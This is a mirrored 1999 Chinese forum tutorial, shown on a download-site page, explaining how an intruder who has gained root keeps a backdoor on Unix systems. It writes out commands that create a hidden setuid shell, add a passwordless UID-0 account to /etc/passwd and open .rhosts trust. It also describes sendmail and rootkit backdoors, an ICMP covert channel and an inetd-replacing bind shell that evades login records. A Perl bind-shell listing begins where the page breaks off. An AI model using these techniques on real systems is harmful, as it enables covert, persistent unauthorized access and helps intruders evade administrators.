⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 363.htm

📁 unix高级编程原吗
💻 HTM
📖 第 1 页 / 共 2 页
字号:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>CTerm非常精华下载</title>
</head>
<body bgcolor="#FFFFFF">
<table border="0" width="100%" cellspacing="0" cellpadding="0" height="577">
<tr><td width="32%" rowspan="3" height="123"><img src="DDl_back.jpg" width="300" height="129" alt="DDl_back.jpg"></td><td width="30%" background="DDl_back2.jpg" height="35"><p align="center"><a href="http://apue.dhs.org"><font face="黑体"><big><big>apue</big></big></font></a></td></tr>
<tr>
<td width="68%" background="DDl_back2.jpg" height="44"><big><big><font face="黑体"><p align="center">               ● UNIX网络编程                       (BM: clown)                </font></big></big></td></tr>
<tr>
<td width="68%" height="44" bgcolor="#000000"><font face="黑体"><big><big><p   align="center"></big></big><a href="http://cterm.163.net"><img src="banner.gif" width="400" height="60" alt="banner.gif"border="0"></a></font></td>
</tr>
<tr><td width="100%" colspan="2" height="100" align="center" valign="top"><br><p align="center">[<a href="index.htm">回到开始</a>][<a href="311.htm">上一层</a>][<a href="364.htm">下一篇</a>]
<hr><p align="left"><small># 如何创建后门 # <br>

---------------------------------------------------------------------------- <br>

---- <br>

 bgyl 于 99-10-3 上午 09:50:15 加贴在 绿盟科技论坛(bbs.nsfocus.com)--UNIX系统 <br>

安全: <br>

                   # 如何创建后门 # <br>

          作 者: zer9 (zer9) 1999.05.03 <br>

      ///////////////////////////////////////////////// <br>

                  # 如何创建后门 # <br>

              how to creat the backdoor <br>

                        by <br>

                       zer9 <br>

                       ==== <br>

      --- <br>

      前言: <br>

           本文之内容可以任意拷贝,传阅。在不违背作者原始 <br>

           意图的情况下也可任意修改,但请在修改后mail给作 <br>

           者一份。谢谢! <br>

      --- <br>

      参考文献: <br>

      Article: backdoor from The Infinity Concept Issue II <br>

      Src:     b4b0.c  by b4b0 <br>

      Src:     daemonsh.pl by van Hauser / [THC] in 1997' <br>



      -- <br>

      千辛万苦(or 轻而易举)的取得root后,当然希望长久的保持. <br>

      以被以后用来。。。d0ing what u want t0 d0 :) <br>

      传统的方法就是建立一个后门(backd00r).即使入侵被发现,好 <br>

      的(先进)后门仍然能够使你再次轻松的破门而入 -- 请记住: <br>

           " we come back and we are the h.a.c.k.e.r " <br>

      -- <br>

      创建后门的方法如下: <br>

      - <br>

      1. setuid <br>

      #cp /bin/sh /tmp/.backdoor <br>

      #chmod u+s /tmp/.backdoor <br>

      加上 suid 位到shell 上,最为简单方便,但也最为容易被ADM <br>

      发现  find / -perm 4000 -print;同时在大多数的SUNOS 上 <br>

      你会发现不能setuid。-- 适用于新手; <br>

      - <br>

      2. echo "zer9::0:0::/:/bin/csh" >> /etc/passwd <br>

      即给系统增加一个 id 为 0(root)的帐号,无口令; <br>

      也很容易被发现。 -- 适用于新手; <br>

      - <br>

      3.echo "+ zer9">>/.rhosts <br>

      即本地的名为 zer9 的用户可以直接 rlogin target 无须口令 <br>



      此时的 zer9 就相当于口令,不知道的人是不能进去的. <br>

      前提是目标的port 512or513or514 opening. <br>

      注: 如 echo "+ +">>/.rhosts 则任何用户都可rlogin至目标 <br>

      导致目标门户打开,最好不要; <br>

      还可 echo "+ +">>/etc/hosts.equiv 但这样不能取得root权限; <br>

          -- 适用于比新手高一点点,比中级水平低一点点的guys; <br>

      - <br>

      4.modify sendmail.cf  增加一个"wiz" 命令; <br>

      usage: <br>

      telnet target 25 [enter] <br>

      wiz[enter] <br>

      这是我从SAFEsuite中学到的(但没试过);比较危险。因为几乎 <br>

      所有的扫描器都会刺探本漏洞。不过你可把命令本身该成其他不易 <br>

      猜到的名字。比较复杂,危险,但ADM不易发现,隐蔽性较强; <br>

      你只在你的机器上试一试就okay了; <br>

          --  顾名思意,大师级漏洞; <br>

      - <br>

      5. crack suck as inetd,login,... <br>

      即安装它们的特络绎版本。你需要找到各版本unix的rootkit; <br>

      然后分别编译即可;-- 如果目标机上没有安装 tripwire之类 <br>

      的东东,那几乎不可能被发现。linux&sunos&freebsd的可能 <br>

      好找,但其他的了?即使你找到了,你有对应平台上的编译器 <br>



      吗?我有一台运行 slackware,one running irix,one running <br>

      sunos,one running hpux,one running digits unix,... <br>

      hahhahha,我又做梦了:) <br>

          -- 我个人认为是最好的方法,但实现起来有一定风险, <br>

             你必须考虑到如果你的木马运行出错怎么办--因为 <br>

             我们所做的一切都必须以不破坏目标机上的任何数 <br>

             据为原则; <br>

      - <br>

      6.ping rem0te backd00r <br>

      即使是防火墙也很少阻止 ICMP 的通过,因此本后门可绕过 <br>

      防火墙。具体的程序你可在 [THC] 的主页发现; <br>

      我想到了另外一种直接用ping命令实现的可通过防火墙的 <br>

      方法 : <br>

        一方在防火墙内,一方在防火墙外;除 ICMP 外;通向防火 <br>

        墙内的信息均被过滤掉 :( <br>

        用 60k data 代表长,10k data 代表短;使用摩尔思编码; <br>

        (或其他自定义编码) <br>

        双方通过 ICMPinfo 接受信息(ping 's data length); <br>

        “嘀,嘀,嘀嘀,嘀,嘀嘀嘀...""长江长江,我是黄河- <br>

        -- 向我开炮!向我开炮”(^o^); <br>

        以后有时间我会通过程序来实现验证可行性的。 <br>

        (技术上应该没有什么难度) <br>



      - <br>

      7.rem0te shell <br>

      我最喜欢的方式。而且由于绕开了login,故用 who 无法 <br>

      看到--也就是说,避开了utmp&utmpx&wtmp&wtmpx;但没有 <br>

      完全避开 syslogd.ADM仍可以在/var/log/messages中发现 <br>

      你。不过,有一种方法可以彻底完全的旁路 syslogd!且听 <br>

      下面一一道来. <br>

      bindshell的实现有两种: <br>

       a. <br>

          替换掉 inetd.conf 中的不重要服务,如 rlogind :) <br>

          在inetd 接受 connect 请求后,直接在本端口 <br>

          利用 system("/bin/csh -i"); <br>

          直接spam 出一个shell, <br>

       b. 接受 connect 后,在高端spam出一个shell; <br>

          (更安全 :) <br>

      下面我给出一个perl 实现(不需socket libary支持) <br>

      (pass on sunos5.5.1&slackware 2.0.33&irix6.4&hpux10.2) <br>

      和一个 gnuc 的实现(test on slackware 2.0.33&irix6.4) <br>

      --- <br>

       perl 版安装方法: <br>

       ###无须编译!!只要目标机上有perl支持就okay! <br>

       如何判断有无perl:   $/>perl [enter] <br>



                           [ctrl-c] <br>

                           $/> <br>

       - <br>

       如果你对 /etc/inetd.conf 中的内容不是很熟的话,下面 <br>

       的方法有很大的危险性, exit(-1) please; <br>

       - <br>

       首先将源程序cut,存为你想要替换的daemon,如in.rexecd or <br>

       or in.rlogind ,in.pop2d....最好是已经被ADM关掉了,而且 <br>

       不太引人注目的daemon,注意,一定要是 TCP types.然后 <br>

       mv /usr/sbin/in.rexecd /usr/sbin/in.rexecd.bak :)) <br>

       cp in.rexecd /usr/sbin/in.rexecd <br>

       然后 ps -aux|grep inetd;kill -HUP id(by inetd); <br>

       okay! 连 /etc/inetd.conf 都不要改。 <br>

       重申一点:不论在任何情况下,我们都要尽最大的可能保护数据! <br>

       - <br>

       Usage: nc target <ur changed daemon's port> (such as 512) <br>

              [enter] <br>

              ur passwd [enter] <br>

              (then u login in...:) <br>

      ----Cut Here------------------------------------------ <br>

      #!/usr/bin/perl <br>

      # <br>

      # <br>

      #         BEST <br>

      #        SIMPLE <br>

      #   rem0te bind shell <br>

      #[perl version only tcp] <br>

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -